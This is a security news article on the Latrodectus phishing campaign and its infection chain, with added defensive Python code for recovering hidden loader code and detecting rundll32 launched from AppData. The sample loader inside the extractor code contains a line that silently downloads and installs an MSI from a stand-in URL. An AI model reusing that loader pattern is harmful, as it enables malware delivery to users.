New Latrodectus malware uses Microsoft and Cloudflare themes

May 2, 2024

A new phishing campaign uses Microsoft Azure and Cloudflare themes as lures to appear legitimate and distribute the recently discovered Latrodectus malware. Latrodectus is a Windows malware downloader that is already spreading widely: it functions as a backdoor, downloads additional EXE and DLL payloads and executes commands on the infected host.

Researchers also note that Latrodectus's distribution and infrastructure overlap with those of the notorious IcedID modular malware loader. Whether the operators intend to retire IcedID in favour of Latrodectus remains unclear, even though the newer malware is increasingly used in phishing attacks.

Separate research has found that the malware is delivered with a variety of PDF lures and themes; the most recent campaign evades security tooling by gating the download behind a fake Cloudflare captcha.

Latrodectus malware typically starts its infection process through an email.

Threat actors spread Latrodectus through reply-chain phishing: they use compromised email accounts to reply to existing conversations with links or attachments that lead to the malware, so the message arrives inside a thread the recipient already trusts.

The campaign begins with either an embedded URL or a PDF attachment that eventually leads to the malware's installation. The PDFs carry generic names such as '04-25-Inv-Doc-339.pdf' and claim to be documents hosted in Microsoft Azure cloud storage that the user must download in order to view.

Clicking the 'Download Document' button sends the recipient to a bogus 'Cloudflare security check' that asks them to solve a simple maths question. The captcha stops automated email security scanners and sandboxes from following the attack chain through to the payload, so only a human who solves it receives the next stage.

When the correct answer is entered, the fake captcha page serves a JavaScript file. The script is obfuscated by padding it with comments: the code that actually matters is hidden inside those comment lines, and a small function extracts the text from the comments and executes it, which downloads an MSI package from a predetermined URL.
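As an added illustration (not code from the original article or from the researchers), the snippet below shows how an analyst can statically recover the code such a comment-padded loader hides, without executing the JavaScript. The comment marker `////`, the sample loader text and the URL in it are all constructed for this example; the page does not state which marker the real sample uses.

```python
import re

# Assumed marker: the article says only that the loader keeps its real code in
# comments; the exact prefix used by the real sample is not given on the page.
HIDDEN_MARKER = "////"

# Constructed sample loader (not the real malware): filler code and junk
# comments around three marked comment lines that carry the actual payload.
SAMPLE_JS = """\
// The quick brown fox jumps over the lazy dog
function calc(a, b) { return a * b + 7; }
//// var shell = new ActiveXObject("WScript.Shell");
// lorem ipsum dolor sit amet
//// var url = "http://example.invalid/update/pkg_1.msi";
/* consectetur adipiscing elit */
//// shell.Run("msiexec /i " + url + " /qn", 0, false);
// sed do eiusmod tempor incididunt
var s = ""; // the visible body never does anything useful
"""

MSI_URL_RE = re.compile(r"https?://[^\s'\"]+\.msi", re.IGNORECASE)


def extract_hidden_code(js_source: str, marker: str = HIDDEN_MARKER) -> str:
    """Rebuild the payload a comment-padded loader executes at runtime.

    The loader's visible statements are filler; the lines it really runs are
    stored as comments prefixed with `marker`, concatenated in file order and
    handed to eval(). Repeating that concatenation statically recovers the
    next-stage code without running any of it.
    """
    hidden = []
    for line in js_source.splitlines():
        stripped = line.strip()
        if stripped.startswith(marker):
            hidden.append(stripped[len(marker):].strip())
    return "\n".join(hidden)


def comment_ratio(js_source: str) -> float:
    """Share of non-empty lines that are comments; padded loaders score high."""
    lines = [ln.strip() for ln in js_source.splitlines() if ln.strip()]
    if not lines:
        return 0.0
    comments = sum(1 for ln in lines if ln.startswith(("//", "/*", "*")))
    return comments / len(lines)


def find_msi_urls(code: str) -> list[str]:
    """Pull every .msi download URL out of recovered payload text."""
    return MSI_URL_RE.findall(code)


if __name__ == "__main__":
    payload = extract_hidden_code(SAMPLE_JS)
    print(payload)
    print("MSI URLs:", find_msi_urls(payload))
    print(f"comment ratio: {comment_ratio(SAMPLE_JS):.2f}")
```

The comment ratio is a cheap triage signal: a script whose lines are mostly comments, yet which still calls `eval` or `Function`, deserves the extraction step before anything else. Swap the marker for whatever prefix a given sample uses.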

The MSI installer drops a DLL named Update_b419643a.dll into the %AppData%\Custom_update folder and launches it with Rundll32.exe. The researchers note that the file and folder names are likely randomised per installation, so detection should key on the behaviour (an MSI install writing a DLL under %AppData% that rundll32 then loads) rather than on these exact names.
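The following is an added example, not part of the original article, of detection logic that keys on this behaviour rather than on the file names. It runs over a few constructed process-creation events (Sysmon-style fields; the user names, the benign entries and the DLL export name are invented for the sample) and flags rundll32.exe loading a DLL from a user-writable AppData path, raising confidence when the parent is msiexec.exe or the path matches the folder reported above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


# Sysmon-style process-creation fields (Event ID 1 naming, snake_cased).
@dataclass
class ProcessCreate:
    parent_image: str
    image: str
    command_line: str


# First .dll argument handed to rundll32, quoted or not.
RUNDLL32_DLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",\s]+\.dll)', re.IGNORECASE)
# Any path under the user's AppData tree (%AppData% expands to AppData\Roaming).
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Roaming|Local)\\", re.IGNORECASE)
# Folder name reported for this campaign; used only to raise confidence.
REPORTED_FOLDER_RE = re.compile(r"\\Custom_update\\", re.IGNORECASE)


def rundll32_dll_path(command_line: str) -> Optional[str]:
    m = RUNDLL32_DLL_RE.search(command_line)
    return m.group(1) if m else None


def classify(ev: ProcessCreate) -> Optional[str]:
    """Return the reasons an event matches the reported execution chain, else None.

    Base condition: rundll32.exe loading a DLL from a user-writable AppData
    path. Extra reasons raise confidence; because the file and folder names
    are reportedly randomised, nothing here depends on them alone.
    """
    if not ev.image.lower().endswith("\\rundll32.exe"):
        return None
    dll = rundll32_dll_path(ev.command_line)
    if dll is None or not USER_WRITABLE_RE.search(dll):
        return None
    reasons = ["rundll32 loading a DLL from a user-writable AppData path"]
    if ev.parent_image.lower().endswith("\\msiexec.exe"):
        reasons.append("parent is msiexec.exe (DLL dropped by an MSI install)")
    if REPORTED_FOLDER_RE.search(dll):
        reasons.append("path matches the reported Custom_update folder")
    return "; ".join(reasons)


def detect(events: list[ProcessCreate]) -> list[tuple[str, str]]:
    hits = []
    for ev in events:
        why = classify(ev)
        if why:
            hits.append((ev.command_line, why))
    return hits


# Constructed events; user names, export names and benign entries are invented.
SAMPLE_EVENTS = [
    ProcessCreate(  # the chain described in the article
        parent_image=r"C:\Windows\System32\msiexec.exe",
        image=r"C:\Windows\System32\rundll32.exe",
        command_line=r'rundll32.exe "C:\Users\alice\AppData\Roaming\Custom_update\Update_b419643a.dll",run',
    ),
    ProcessCreate(  # benign: Control Panel applet launched from Explorer
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\rundll32.exe",
        command_line=r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    ),
    ProcessCreate(  # suspicious but lower confidence: DLL in Temp, no MSI parent
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\rundll32.exe",
        command_line=r'rundll32.exe "C:\Users\bob\AppData\Local\Temp\helper.dll",Start',
    ),
    ProcessCreate(  # the installer itself is not what this rule keys on
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\msiexec.exe",
        command_line=r"msiexec.exe /i C:\Users\alice\Downloads\doc.msi /qn",
    ),
]

if __name__ == "__main__":
    for cmd, why in detect(SAMPLE_EVENTS):
        print(f"ALERT: {cmd}\n  {why}")
```

The base condition alone will fire on some legitimate software that unpacks into AppData, so in production the msiexec parent and a DLL write by the same installer shortly beforehand are what lift an event from "review" to "alert".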

The DLL, which contains Latrodectus itself, then runs quietly in the background while the operators deploy further payloads or execute commands. A successful infection can therefore drop additional malware and give attackers initial access to corporate networks, which can lead to far more damaging attacks.

Going forward, such infections are likely to lead to a wider range of follow-on malware, such as Cobalt Strike, and to closer ties with ransomware gangs, following the pattern seen with IcedID. If a device is infected with Latrodectus, it is vital to take it offline as quickly as possible (isolating it from the network rather than powering it off preserves volatile evidence for the investigation) and to monitor the network for unusual activity.
